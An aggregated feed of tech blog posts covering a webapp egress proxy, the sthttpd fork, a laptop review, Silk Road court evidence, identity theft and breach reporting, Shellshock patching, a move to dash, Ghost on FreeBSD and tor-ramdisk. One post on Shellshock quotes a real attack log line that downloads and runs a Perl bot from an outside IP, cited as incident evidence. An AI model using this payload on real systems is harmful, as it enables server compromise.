The situation for the other two apps is a bit more complex: my blog wants to at least announce that there are new blog posts, and it needs to reach Akismet; both actions use HTTP and HTTPS. WordPress is a bit more complex because I don't have much control over it (it has a dedicated server, so I don't have to care), but I assume it mostly is also HTTP and HTTPS. The obvious idea would be to allow ports 80, 443 and 53 (for resolution). But you can do something better. You can put a proxy on your localhost, and force the webapp to go through it, either as a transparent proxy or by using the environment variable http_proxy to convince the webapp to never connect directly to the web. Unfortunately that is not straight forward to implement as neither Passenger not php-fpm has a clean way to pass environment variables per users.

What I've done is for now is to hack the environment.rb file to set ENV['http_proxy'] = 'http://127.0.0.1:3128/' so that Ruby will at least respect it. I'm still out for a solution for PHP unfortunately. In the case of Typo, this actually showed me two things I did not know: when looking at the admin dashboard, it'll make two main HTTP calls: one to Google Blog Search – which was shut down back in May – and one to Typo's version file — which is now a 404 page since the move to the Publify name. I'll be soon shutting down both implementations since I really don't need it. Indeed the Publify development still seems to go toward the "let's add all possible new features that other blogging sites have" without considering the actual scalability of the platform. I don't expect me to go back to it any time soon.


Two years ago, I took on the maintenance of thttpd, a web server written by Jef Poskanzer at ACME Labs [1].  The code hadn’t been update in about 10 years and there were dozens of accumulated patches on the Gentoo tree, many of which addressed serious security issues.  I emailed upstream and was told the project was “done” whatever that meant, so I was going to tree clean it.  I expressed my intentions on the upstream mailing list when I got a bunch of “please don’t!” from users.  So rather than maintain a ton of patches, I forked the code, rewrote the build system to use autotools, and applied all the patch.  I dubbed the fork sthttpd.  There was no particular meaning to the “s”.  Maybe “still kicking”?

I put a git repo up on my server [2], got a mail list going [3], and set up bugzilla [4].  There hasn’t been much activity but there was enough because it got noticed by someone who pushed it out in OpenBSD ports [5].

Today, I finally pushed out 2.27.0 after two years.  This release takes care of a couple of new security issues: I fixed the world readable log problem, CVE-2013-0348 [6], and Vitezslav Cizek <vcizek@suse.com>  from OpenSUSE fixed a possible DOS triggered by specially crafted .htpasswd. Bob Tennent added some code to correct headers for .svgz content, and Jean-Philippe Ouellet did some code cleanup.  So it was time.

Web servers are not my style, but its tiny size and speed makes it perfect for embedded systems which are near and dear to my heart.  I also make sure it compiles on *BSD and Linux with glibc, uClibc or musl.  Not bad for a codebase which is over 10 years old!  Kudos to Jef.



While I got along well with my Thinkpad T61 laptop, for quite some time I had the plan to get a new one soon. It wasn't an easy decision and I looked in detail at the models available in recent months. I finally decided to buy one of Lenovo's Thinkpad X1 Carbon laptops in its 2014 edition. The X1 Carbon was introduced in 2012, however a completely new variant which is very different from the first one was released early 2014. To distinguish it from other models it is the 20A7 model.

Judging from the first days of use I think I made the right decision. I hadn't seen the device before I bought it because it seems rarely shops keep this device in stock. I assume this is due to the relatively high price.

I was a bit worried because Lenovo made some unusual decisions for the keyboard, however having used it for a few days I don't feel that it has any severe downsides. The most unusual thing about it is that it doesn't have normal F1-F12 keys, instead it has what Lenovo calls an adaptive keyboard: A touch sensitive line which can display different kinds of keys. The idea is that different applications can have their own set of special keys there. However, just letting them display the normal F-keys works well and not having "real" keys there doesn't feel like a big disadvantage. Beside that Lenovo removed the Caps lock and placed Pos1/End there, which is a bit unusual but also nothing I worried about. I also hadn't seen any pictures of the German keyboard before I bought the device. The ^/°-key is not where it's used to be (small downside), but the </>/| key is where it belongs(big plus, many laptop vendors get that wrong).

Good things:
* Lightweight, Ultrabook, no unnecessary stuff like CD/DVD drive
* High resolution (2560x1440)
* Hardware is up-to-date (Haswell chipset)

Downsides:
* Due to ultrabook / integrated design easy changing battery, ram or HD
* No SD card reader
* Have some trouble getting used to the touchpad (however there are lots of possibilities to configure it, I assume by playing with it that'll get better)

It used to be the case that people wrote docs how to get all the hardware in a laptop running on Linux which I did my previous laptops. These days this usually boils down to "run a recent Linux distribution with the latest kernels and xorg packages and most things will be fine". However I thought having a central place where I collect relevant information would be nice so I created one again. As usual I'm running Gentoo Linux.

For people who plan to run Linux without a dual boot it may be worth mentioning that there seem to be troublesome errors in earlier versions of the BIOS and the SSD firmware. You may want to update them before removing Windows. On my device they were already up-to-date.


New court documents released this week by the U.S. government in its case against the alleged ringleader of the Silk Road online black market and drug bazaar suggest that the feds may have some ‘splaining to do.

The login prompt and CAPTCHA from the Silk Road home page.
Prior to its disconnection last year, the Silk Road was reachable only via Tor, software that protects users’ anonymity by bouncing their traffic between different servers and encrypting the traffic at every step of the way. Tor also lets anyone run a Web server without revealing the server’s true Internet address to the site’s users, and this was the very technology that the Silk road used to obscure its location.

Last month, the U.S. government released court records claiming that FBI investigators were able to divine the location of the hidden Silk Road servers because the community’s login page employed an anti-abuse CAPTCHA service that pulled content from the open Internet — thus leaking the site’s true Internet address.

But lawyers for alleged Silk Road captain Ross W. Ulbricht (a.k.a. the “Dread Pirate Roberts”) asked the court to compel prosecutors to prove their version of events.  And indeed, discovery documents reluctantly released by the government this week appear to poke serious holes in the FBI’s story.



For starters, the defense asked the government for the name of the software that FBI agents used to record evidence of the CAPTCHA traffic that allegedly leaked from the Silk Road servers. The government essentially responded (PDF) that it could not comply with that request because the FBI maintained no records of its own access, meaning that the only record of their activity is in the logs of the seized Silk Road servers.

The response that holds perhaps the most potential to damage the government’s claim comes in the form of a configuration file (PDF) taken from the seized servers. Nicholas Weaver,a researcher at the International Computer Science Institute (ICSI) and at the University of California, Berkeley, explains the potential significance:

“The IP address listed in that file — 62.75.246.20 — was the front-end server for the Silk Road,” Weaver said. “Apparently, Ulbricht had this split architecture, where the initial communication through Tor went to the front-end server, which in turn just did a normal fetch to the back-end server. It’s not clear why he set it up this way, but the document the government released in 70-6.pdf shows the rules for serving the Silk Road Web pages, and those rules are that all content – including the login CAPTCHA – gets served to the front end server but to nobody else. This suggests that the Web service specifically refuses all connections except from the local host and the front-end Web server.”

Translation: Those rules mean that the Silk Road server would deny any request from the Internet that wasn’t coming from the front-end server, and that includes the CAPTCHA.

“This configuration file was last modified on June 6, so on June 11 — when the FBI said they [saw this leaky CAPTCHA] activity — the FBI could not have seen the CAPTCHA by connecting to the server while not using Tor,” Weaver said. “You simply would not have been able to get the CAPTCHA that way, because the server would refuse all requests.”

The FBI claims that it found the Silk Road server by examining plain text Internet traffic to and from the Silk Road CAPTCHA, and that it visited the address using a regular browser and received the CAPTCHA page. But Weaver says the traffic logs from the Silk Road server (PDF) that also were released by the government this week tell a different story.

“The server logs which the FBI provides as evidence show that, no, what happened is the FBI didn’t see a leakage coming from that IP,” he said. “What happened is they contacted that IP directly and got a PHPMyAdmin configuration page.” See this PDF file for a look at that PHPMyAdmin page. Here is the PHPMyAdmin server configuration.

But this is hardly a satisfying answer to how the FBI investigators located the Silk Road servers. After all, if the FBI investigators contacted the PHPMyAdmin page directly, how did they know to do that in the first place?

“That’s still the $64,000 question,” Weaver said. “So both the CAPTCHA couldn’t leak in that configuration, and the IP the government visited wasn’t providing the CAPTCHA, but instead a PHPMyAdmin interface. Thus, the leaky CAPTCHA story is full of holes.”

Many in the Internet community have officially called baloney [that's a technical term] on the government’s claims, and these latest apparently contradictory revelations from the government are likely to fuel speculation that the government is trying to explain away some not-so-by-the-book investigative methods.

“I find it surprising that when given the chance to provide a cogent, on-the record explanation for how they discovered the server, they instead produced a statement that has been shown inconsistent with reality, and that they knew would be inconsistent with reality,” Weaver said. “”Let me tell you, those tin foil hats are looking more and more fashionable each day.”


The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.15, the “Oops, we did it again!” release. This release fixes the broken installation introduced with phpMyFAQ 2.8.14 and updates the Farsi translation.


A Florida man was sentenced today to 27 months in prison for trying to purchase Social Security numbers and other data from an identity theft service that pulled consumer records from a subsidiary of credit bureau Experian.

Ngo’s ID theft service superget.info
Derric Theoc, 36, pleaded guilty to attempting to purchase Social Security and bank account records on more than 100 Americans with the intent to open credit card accounts and file fraudulent tax returns in the victims’ names. According to prosecutors, Theoc had purchased numerous records from Superget.info, a now-defunct online identity theft service that was run by Vietnamese individual named Hieu Minh Ngo.

Ngo was arrested in 2012 by U.S. Secret Service agents, after he was lured to Guam by an undercover investigator who’d proposed a business deal to expand Ngo’s personal consumer data stores. As part of a guilty plea, Ngo later admitted that he’d obtained personal information on consumers from a variety of data broker companies by posing as a private investigator based in the United States.

Among the biggest brokers that Ngo bought from was Court Ventures, a company that was acquired in March 2012 by Experian — one of the three major credit bureaus. Court records show that for almost ten months after Experian completed that acquisition, Ngo continued siphoning consumer data and paying for the information via cash wire transfers from a bank in Singapore.

After Ngo’s arrest, Secret Service investigators in early 2013 quietly assumed control over his identity theft service in the hopes of identifying and arresting at least some of his more than 1,000 paying customers.

Theoc is just the latest in a string of identity thieves to have been rounded up for attempting to purchase additional records after the service came under the government’s control. In May, I wrote about another big beneficiary of Ngo’s service: An identity theft ring of at least 32 people who were arrested last year for allegedly using the information to steal millions from more than 1,000 victims across the country.

In April, this publication featured a story about 28-year-old Dayton, Ohio resident Lance Ealy, whom the government alleges also used Ngo’s services to steal financial records used for tax return fraud.

In October 2013, KrebsOnSecurity broke the news that Experian’s subsidiary was a major contributor to Ngo’s identity theft service. In subsequent hearings on Capital Hill, Experian executives assured lawmakers with the curious contradiction that the company knew who the victims were and that they’d be taken care of, but that there was no evidence that any consumers had actually been harmed as a result of Experian’s oversight. It remains unclear if Experian, Court Ventures or any other firm duped by Ngo will ever be made to fully and publicly account for the damage done here, although earlier this year several state attorneys general announced that they’d launched their own investigation into the matter.


The phpMyFAQ Team is pleased to announce phpMyFAQ 2.8.14, the “Happy Birthday, Bianca!” release. This release fixes an installation compatibility issue with MySQL 5.1 and MySQL 5.5 introduced with phpMyFAQ 2.8.13. We also fixed some minor issues.


Just a short update about the server that houses the podcast files.  University IT consolidation has created some unplanned changes, but I hope to have a new server spun up soon.  Also, curious to hear what all of you use for your home directory on the Internet.

File Info: 7Min, 3MB.

Ogg Link: https://archive.org/download/bsdtalk245/bsdtalk245.ogg


Since it happened every time with my master-slave setup that data of new probes does not show up, I am blogging it here for future reference.

Make sure that the Smokeping directory is writable for www-data.

root@orion:/var/lib# ls -la | grep smokeping
drwxrwxr-x  7 smokeping     www-data       4096 Sep 30 16:11 smokeping
Furthermore make sure that the directories and RRD files in the directories have the correct permissions. When Smokeping creates new RRDs they have wrong permissions!

root@orion:/var/lib/smokeping# ll
total 28
drwxrwxr-x  7 smokeping www-data 4096 Sep 30 16:11 ./
drwxr-xr-x 70 root      root     4096 Sep 30 11:56 ../
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:19 Bandwidth/
drwxrwxr-x  2 smokeping www-data 4096 Aug 11 13:45 MultiHost/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 Other/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:21 S/
drwxrwxr-x  2 smokeping www-data 4096 Sep 30 19:20 __sortercache/
As soon as the permissions are correct, data starts showing up. As you can see there is a *.slave_cache file since one of the slaves is currently sending data. The file is owned by the Apache process because the master-slave-communication uses the Smokeping CGI.

root@orion:/var/lib/smokeping/Bandwidth# ll
total 4076
drwxrwxr-x 2 smokeping www-data    4096 Sep 30 19:23 ./
drwxrwxr-x 7 smokeping www-data    4096 Sep 30 16:11 ../
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~home.rrd
-rw-r--r-- 1 www-data  www-data      78 Sep 30 19:23 Target.home.slave_cache
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:17 Target~sg.rrd
-rw-rw-r-- 1 smokeping www-data 1039568 Sep 30 19:23 Target~us.rrd
I hope this helps.



Apple has released updates to insulate Mac OS X systems from the dangerous “Shellshock” bug, a pervasive vulnerability that is already being exploited in active attacks.

Patches are available via Software Update, or from the following links for OS X Mavericks, Mountain Lion, and Lion.

After installing the updates, Mac users can check to see whether the flaw has been truly fixed by taking the following steps:

* Open Terminal, which you can find in the Applications folder (under the Utilities subfolder on Mavericks) or via Spotlight search.

* Execute this command:
bash –version [author's note: my WordPress install is combining these two dashes; it should read the word "bash" followed by a space, then two dashes, and the word "version"].

* The version after applying this update will be:

OS X Mavericks:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin13)
OS X Mountain Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin12)
OS X Lion:  GNU bash, version 3.2.53(1)-release (x86_64-apple-darwin11)


Today was an interesting one that I probably won’t forget for a while. Sure, I will likely forget all the details, but the point of the day will remain in my head for a long time to come. Why? Simply put, it made me think about the power of positivity (which is not generally a topic that consumes much of my thought cycles).

I started out the day in the same way that I start out almost every other day—with a run. I had decided that I was going to go for a 15 km run instead of the typical 10 or 12, but that’s really irrelevant. Within the first few minutes, I passed an older woman (probably in her mid-to-late sixties), and I said “good morning.” She responded with “what a beautiful smile! You make sure to give that gift to everyone today.” I was really taken back by her comment because it was rather uncommon in this day and age.

Her comment stuck with me for the rest of the run, and I thought about the power that it had. It cost her absolutely nothing to say those refreshing, kind words, and yet, the impact was huge! Not only did it make me feel good, but it had other positive qualities as well. It made me more consciously consider my interactions with so-called “strangers.” I can’t control any aspect of their lives, and I wouldn’t want to do so. However, a simple wave to them, or a “good morning” may make them feel a little more interconnected with humanity.

Not all that long after, I went to get a cup of coffee from a corner shop. The clerk asked if that would be all, and I said it was. He said “Have a good day.” I didn’t have to pay for it because apparently it was National Coffee Day. Interesting. The more interesting part, though, was when I was leaving the store. I held the door for a man, and he said “You, sir, are a gentleman and a scholar,” to which I responded “well, at least one of those.” He said “aren’t you going to tell me which one?” I said “nope, that takes the fun out of it.”

That brief interaction wasn’t anything special at all… or was it? Again, it embodied the interconnectedness of humanity. We didn’t know each other at all, but yet we were able to carry on a short conversation, understand one another’s humour, and, in our own ways, thank each other. He thanked me for a small gesture of politeness, and I thanked him for acknowledging it. All too often those types of gestures go without as much as a “thank you.” All too often, these types of gestures get neglected and never even happen.

What’s my point here? Positivity is infectious and in a great way! Whenever you’re thinking that the things you do and say don’t matter, think again. Just treating the people with whom you come in contact many, many times each day with a little respect can positively change the course of their day. A smile, saying hello, casually asking them how they’re doing, holding a door, helping someone pick up something that they’ve dropped, or any other positive interaction should be pursued (even if it is a little inconvenient for you). Don’t underestimate the power of positivity, and you may just help someone feel better. What’s more important than that? That’s not a rhetorical question; the answer is “nothing.”

Cheers,
Zach


“Please note that [COMPANY NAME] takes the security of your personal data very seriously.” If you’ve been on the Internet for any length of time, chances are very good that you’ve received at least one breach notification email or letter that includes some version of this obligatory line. But as far as lines go, this one is about as convincing as the classic break-up line, “It’s not you, it’s me.”



I was reminded of the sheer emptiness of this corporate breach-speak approximately two weeks ago, after receiving a snail mail letter from my Internet service provider — Cox Communications. In its letter, the company explained:

“On or about Aug. 13, 2014, “we learned that one of our customer service representatives had her account credentials compromised by an unknown individual. This incident allowed the unauthorized person to view personal information associated with a small number of Cox accounts. The information which could have been viewed included your name, address, email address, your Secret Question/Answer, PIN and in some cases, the last four digits only of your Social Security number or drivers’ license number.”

The letter ended with the textbook offer of free credit monitoring services (through Experian, no less), and the obligatory “Please note that Cox takes the security of your personal data very seriously.” But I wondered how seriously they really take it. So, I called the number on the back of the letter, and was directed to Stephen Boggs, director of public affairs at Cox.

Boggs said that the trouble started after a female customer account representative was “socially engineered” or tricked into giving away her account credentials to a caller posing as a Cox tech support staffer. Boggs informed me that I was one of just 52 customers whose information the attacker(s) looked up after hijacking the customer service rep’s account.

The nature of the attack described by Boggs suggested two things: 1) That the login page that Cox employees use to access customer information is available on the larger Internet (i.e., it is not an internal-only application); and that 2) the customer support representative was able to access that public portal with nothing more than a username and a password.

Boggs either did not want to answer or did not know the answer to my main question: Were Cox customer support employees required to use multi-factor or two-factor authentication to access their accounts? Boggs promised to call back with an definitive response. To Cox’s credit, he did call back a few hours later, and confirmed my suspicions.

“We do use multifactor authentication in various cases,” Boggs said. “However, in this situation there was not two-factor authentication. We are taking steps based on our investigation to close this gap, as well as to conduct re-training of our customer service representatives to close that loop as well.”

This sad state of affairs is likely the same across multiple companies that claim to be protecting your personal and financial data. In my opinion, any company — particularly one in the ISP business — that isn’t using more than a username and a password to protect their customers’ personal information should be publicly shamed.

Unfortunately, most companies will not proactively take steps to safeguard this information until they are forced to do so — usually in response to a data breach.  Barring any pressure from Congress to find proactive ways to avoid breaches like this one, companies will continue to guarantee the security and privacy of their customers’ records, one breach at a time.


Rückkehr des IPJ Security-Planet.de | 2014-09-29 19:17 UTC

Das Internet Protocol Journal war eines der besten Publikationen im Netzwerk-Sektor. Deshalb war ich recht enttäuscht als dieses im letzten Jahr eingestellt wurde. Um so erfreulicher, dass das IPJ mit neuen Sponsoren neu aufgelegt wurde. So habe ich meine Ausgabe am Wochenende im Briefkasten gehabt.
Noch ist auf der neuen Webseite noch nicht zu finden, wie die Print-Ausgabe aboniert werden kann. Die Online-Version kann aber — wie früher auch — online herunter geladen werden.
Die Haupt-Themen der aktuellen Ausgabe sind

  • Gigabit Wi-Fi
  • A Question of DNS Protocols


PostgreSQL Ebuilds Unified titanofold | 2014-09-29 18:21 UTC

I’ve finished making the move to unified PostgreSQL ebuilds in my overlay. Please give it a go and report any problems there.

Also, I know the comments are disabled. I have 27,186 comments to moderate. All of them are spam. I don’t want to deal with it.

(See my previous post on the topic for why.)


Bye bye Feedburner some useful things | 2014-09-29 14:26 UTC

Da mir die Verwendung von Feedburner keinen Mehrwert mehr bringt, habe ich die Feeds wieder auf die Original-Wordpress-Feeds umgestellt. Die Adresse des RSS-Feedss lautet nun: https://nodomain.cc/feed

Bitte aktualisiert eure Feedreader!



If you have any interest in IT security you probably heared of a vulnerability in the command line shell Bash now called Shellshock. Whenever serious vulnerabilities are found in such a widely used piece of software it's inevitable that this will have some impact. Machines get owned and abused to send Spam, DDoS other people or spread Malware. However, I feel a lot of the scale of the impact is due to the fact that far too many people run infrastructure in the Internet in an irresponsible way.

After Shellshock hit the news it didn't take long for the first malicious attacks to appear in people's webserver logs - beside some scans that were done by researchers. On Saturday I had a look at a few of such log entries, from my own servers and what other people posted on some forums. This was one of them:

0.0.0.0 - - [26/Sep/2014:17:19:07 +0200] "GET /cgi-bin/hello HTTP/1.0" 404 12241 "-" "() { :;}; /bin/bash -c \"cd /var/tmp;wget http://213.5.67.223/jurat;curl -O /var/tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat;rm -rf /tmp/jurat\""

Note the time: This was on Friday afternoon, 5 pm (CET timezone). What's happening here is that someone is running a HTTP request where the user agent string which usually contains the name of the software (e. g. the browser) is set to some malicious code meant to exploit the Bash vulnerability. If successful it would download a malware script called jurat and execute it. We obviously had already upgraded our Bash installation so this didn't do anything on our servers. The file jurat contains a perl script which is a malware called IRCbot.a or Shellbot.B.

For all such logs I checked if the downloads were still available. Most of them were offline, however the one presented here was still there. I checked the IP, it belongs to a dutch company called AltusHost. Most likely one of their servers got hacked and someone placed the malware there.

I tried to contact AltusHost in different ways. I tweetet them. I tried their live support chat. I could chat with somebody who asked me if I'm a customer. He told me that if I want to report an abuse he can't help me, I should write an email to their abuse department. I asked him if he couldn't just tell them. He said that's not possible. I wrote an email to their abuse department. Nothing happened.

On sunday noon the malware was still online. When I checked again on late Sunday evening it was gone.

Don't get me wrong: Things like this happen. I run servers myself. You cannot protect your infrastructure from any imaginable threat. You can greatly reduce the risk and we try a lot to do that, but there are things you can't prevent. Your customers will do things that are out of your control and sometimes security issues arise faster than you can patch them. However, what you can and absolutely must do is having a reasonable crisis management.

When one of the servers in your responsibility is part of a large scale attack based on a threat that's headline in all news I can't even imagine what it takes not to notice for almost two days. I don't believe I was the only one trying to get their attention. The timescale you take action in such a situation is the difference between hundreds or millions of infected hosts. Having your hosts deploy malware that long is the kind of thing that makes the Internet a less secure place for everyone. Companies like AltusHost are helping malware authors. Not directly, but by their inaction.



Photo credit: Liam Quinn
This is going to be interesting as Planet Gentoo is currently unavailable as I write this. I'll try to send this out further so that people know about it.

By now we have all been doing our best to update our laptops and servers to the new bash version so that we are safe from the big scare of the quarter, shellshock. I say laptop because the way the vulnerability can be exploited limits the impact considerably if you have a desktop or otherwise connect only to trusted networks.

What remains to be done is to figure out how to avoid this repeats. And that's a difficult topic, because a 25 years old bug is not easy to avoid, especially because there are probably plenty of siblings of it around, that we have not found yet, just like this last week. But there are things that we can do as a whole environment to reduce the chances of problems like this to either happen or at least avoid that they escalate so quickly.

In this post I want to look into some things that Gentoo and its developers can do to make things better.

The first obvious thing is to figure out why /bin/sh for Gentoo is not dash or any other very limited shell such as BusyBox. The main answer lies in the init scripts that still use bashisms; this is not news, as I've pushed for that four years ago, while Roy insisted on it even before that. Interestingly enough, though, this excuse is getting less and less relevant thanks to systemd. It is indeed, among all the reasons, one I find very much good in Lennart's design: we want declarative init systems, not imperative ones. Unfortunately, even systemd is not as declarative as it was originally supposed to be, so the init script problem is half unsolved — on the other hand, it does make things much easier, as you have to start afresh anyway.

If either all your init scripts are non-bash-requiring or you're using systemd (like me on the laptops), then it's mostly safe to switch to use dash as the provider for /bin/sh:

# emerge eselect-sh
# eselect sh set dash
That will change your /bin/sh and make it much less likely that you'd be vulnerable to this particular problem. Unfortunately as I said it's mostly safe. I even found that some of the init scripts I wrote, that I checked with checkbashisms did not work as intended with dash, fixes are on their way. I also found that the lsb_release command, while not requiring bash itself, uses non-POSIX features, resulting in garbage on the output — this breaks facter-2 but not facter-1, I found out when it broke my Puppet setup.

Interestingly it would be simpler for me to use zsh, as then both the init script and lsb_release would have worked. Unfortunately when I tried doing that, Emacs tramp-mode froze when trying to open files, both with sshx and sudo modes. The same was true for using BusyBox, so I decided to just install dash everywhere and use that.

Unfortunately it does not mean you'll be perfectly safe or that you can remove bash from your system. Especially in Gentoo, we have too many dependencies on it, the first being Portage of course, but eselect also qualifies. Of the two I'm actually more concerned about eselect: I have been saying this from the start, but designing such a major piece of software – that does not change that often – in bash sounds like insanity. I still think that is the case.

I think this is the main problem: in Gentoo especially, bash has always been considered a programming language. That's bad. Not only because it only has one reference implementation, but it also seem to convince other people, new to coding, that it's a good engineering practice. It is not. If you need to build something like eselect, you do it in Python, or Perl, or C, but not bash!

Gentoo is currently stagnating, and that's hard to deny. I've stopped being active since I finally accepted stable employment – I'm almost thirty, it was time to stop playing around, I needed to make a living, even if I don't really make a life – and QA has obviously taken a step back (I still have a non-working dev-python/imaging on my laptop). So trying to push for getting rid of bash in Gentoo altogether is not a good deal. On the other hand, even though it's going to be probably too late to be relevant, I'll push for having a Summer of Code next year to convert eselect to Python or something along those lines.

Myself, I decided that the current bashisms in the init scripts I rely upon on my servers are simple enough that dash will work, so I pushed that through puppet to all my servers. It should be enough, for the moment. I expect more scrutiny to be spent on dash, zsh, ksh and the other shells in the next few months as people migrate around, or decide that a 25 years old bug is enough to think twice about all of them, o I'll keep my options open.

This is actually why I like software biodiversity: it allows to have options to select different options when one components fail, and that is what worries me the most with systemd right now. I also hope that showing how bad bash has been all this time with its closed development will make it possible to have a better syntax-compatible shell with a proper parser, even better with a proper librarised implementation. But that's probably hoping too much.


The third BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


Rechtsstreit mit einem Geist My Universe | 2014-09-28 06:59 UTC

Das Update auf die jüngste Ghost Version 0.5.2 birgt einige Tücken — meine eigene Installationsanleitung deckt einige der neu hinzugekommenen Schwierigkeiten nicht ab, wobei selbige überwiegend daraus entstehen, dass der Geist bei mir unter FreeBSD seinen Dienst tun muss.

Die erste Hürde bestand in einer endlos langen Liste an Fehlermeldungen, ausgeworfen von einem harmlosen npm install --production. Obwohl Ghost bei mir für den Einsatz mit PostgreSQL konfiguriert ist, erzwingt es nun den Bau der SQLite Module, deren Abhängigkeiten natürlich nicht installiert waren — ein vermeintlich leicht zu behebendes Problem:

pkg update && pkg upgrade  
pkg ins sqlite3 py27-sqlite3  
Damit war zwar die Gestalt der Fehlermeldung verändert, gebannt war sie jedoch nicht. Bei tiefergehender Wühltätigkeit in den Fehlerlogs und diverser JSON- und JavaScript-Dateien durfte ich dann feststellen, dass an irgendeiner Stelle der Pfad für den Python-Interpreter hart verdrahtet gewesen sein muss, so dass die Umgebungsvariable PYTHON in diesem Fall gar nicht zum Tragen kam und ignoriert wurde.

Die Lösung des Problems ist recht simpel — ein Symlink löst das Problem (wenn auch nicht sehr elegant):

cd /usr/local/bin  
ln -s python2 python  
Danach bauten alle Abhängigkeiten jedenfalls anstandslos durch, und manuell (per npm start oder node index.js) ließ sich Ghost auch ohne weiteres starten. Doch hier fing der wirklich lustige Teil erst an, denn Supervisor konnte Ghost nicht dazu bewegen, sich nicht selbst sofort wieder zu beenden, was zu solch skurrilen Log-Einträgen führte:

2014-09-27 15:06:42,973 INFO spawned: 'ghost' with pid 40876  
2014-09-27 15:06:43,027 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:44,092 INFO spawned: 'ghost' with pid 40877  
2014-09-27 15:06:44,146 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:46,240 INFO spawned: 'ghost' with pid 40879  
2014-09-27 15:06:46,295 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:49,600 INFO spawned: 'ghost' with pid 40883  
2014-09-27 15:06:49,655 INFO exited: ghost (exit status 0; not expected)  
2014-09-27 15:06:50,678 INFO gave up: ghost entered FATAL state, too many start retries too quickly  
Der Ghost-Prozess verabschiedete sich also umgehend wieder mit Exit-Status 0. Ja, richtig verstanden, Ghost macht die Grätsche, meldet aber, normal beendet worden zu sein. Und da Ghost von der Kommandozeile anstandslos startete und funktionierte, suchte ich die Schuld natürlich beim supervisord — vergeblich, wie ich im Nachhinein feststellen durfte.

Es war der renitente Geist, der sich (wieder mal) ungehorsam gegenüber seinem Prozess-Aufseher gab. Mangels klarer Ursache für dieses Verhalten half auch hier nur die Analyse von Logfiles (bedingt) und des Quellcodes. Stein des Anstoßes waren letztlich die Berechtigungen im content-Verzeichnis der Ghost Installation.

Während die Unterverzeichnisse data und images schon immer Schreibrechte für den Geist verlangten, sah das bei apps und themes anders aus — gerade letzteres durfte in meinem Setup nur gelesen werden, da ich dem ja noch recht unreifen Ghost möglichst wenig Gelegenheit bieten wollte, im Falle einer hackbaren Sicherheitslücke persistenten Schaden anzurichten (wie z. B. bösartiges JavaScript in das Theme einzuschmuggeln).

Temporär lässt sich das seltsame Verhalten von Ghost also abstellen, wenn man ihm die gewünschten Rechte einräumt — doch wie bei einem trotzigen Kind ist Nachgeben in diesem Fall vielleicht nicht die beste Idee. Deshalb habe ich im Ghost Forum einen entsprechenden Diskussionspunkt eröffnet, in der Hoffnung, dass Ghost in einem der nächsten Releases dann still akzeptiert, nicht überall auf der Festplatte herumkritzeln zu dürfen.


I’ve been blogging about my non-Gentoo work using my drupal site at http://opensource.dyc.edu/  but since I may be loosing that server sometime in the future, I’m going to start duplicating those posts here.  This work should be of interest to readers of Planet Gentoo because it draws a lot from Gentoo, but it doesn’t exactly fall under the category of a “Gentoo Project.”

Anyhow, today I’m releasing tor-ramdisk 20140925.  As you may recall from a previous post, tor-ramdisk is a uClibc-based micro Linux distribution I maintain whose only purpose is to host a Tor server in an environment that maximizes security and privacy.  Security is enhanced using Gentoo’s hardened toolchain and kernel, while privacy is enhanced by forcing logging to be off at all levels.  Also, tor-ramdisk runs in RAM, so no information survives a reboot, except for the configuration file and the private RSA key, which may be exported/imported by FTP or SCP.

A few days ago, the Tor team released 0.2.4.24 with one major bug fix according to their ChangeLog. Clients were apparently sending the wrong address for their chosen rendezvous points for hidden services, which sounds like it shouldn’t work, but it did because they also sent the identity digest. This fix should improve surfing of hidden services. The other minor changes involved updating geoip information and the address of a v3 directory authority, gabelmoo.

I took this opportunity to also update busybox to version 1.22.1, openssl to 1.0.1i, and the kernel to 3.16.3 + Gentoo’s hardened-patches-3.16.3-1.extras. Both the x86 and x86_64 images were tested using node “simba” and showed no issues.

You can get tor-ramdisk from the following urls (at least for now!)

i686:
Homepage: http://opensource.dyc.edu/tor-ramdisk
Download: http://opensource.dyc.edu/tor-ramdisk-downloads

x86_64:
Homepage: http://opensource.dyc.edu/tor-x86_64-ramdisk
Download: http://opensource.dyc.edu/tor-x86_64-ramdisk-downloads




Photo credit: Images_of_Money
Almost exactly 18 months after moving to Ireland I'm finally bound to receive my first Irish credit card. This took longer than I was expecting but at least it should cover a few of the needs I have, although it's not exactly my perfect plan either. But I guess it's better start from the top.

First of all, I have already credit cards, Italian ones that as I wrote before, they are not chip'n'pin which causes a major headache in countries such as Ireland (but UK too), where non-chip'n'pin capable cards are not really well supported or understood. This means that they are not viable, even though I have been using them for years and I have enough credit history with them that they have a higher limit than the norm, which is especially handy when dealing with things like expensive hotels if I'm on vacation.

But the question becomes why do I need a credit card? The answer lies in the mess that the Irish banking system is: since there is no "good" bank over here, I've been using the same bank I was signed up with when I arrived, AIB. Unfortunately their default account, which is advertised as "free", is only really free if for the whole quarter your bank account never goes below €2.5k. This is not the "usual" style I've seen from American banks where they expect that your average does not go below a certain amount, it does not matter if one day you have no money and the next you have €10k on it: if for one day in the quarter you dip below the threshold, you have to pay for the account, and dearly. At that point every single operation becomes a €.20 charge. Including PayPal's debit/credit verification, AdSense EFT account verification, Amazon KDP monthly credits. And including every single use of your debit card — for a while, NFC payments were excluded, so I tried to use it more, but very few merchants allowed that, and the €15 limit on its use made it quite impractical to pay most things. In the past year and a half, I paid an average of €50/quarter for a so-called free account.

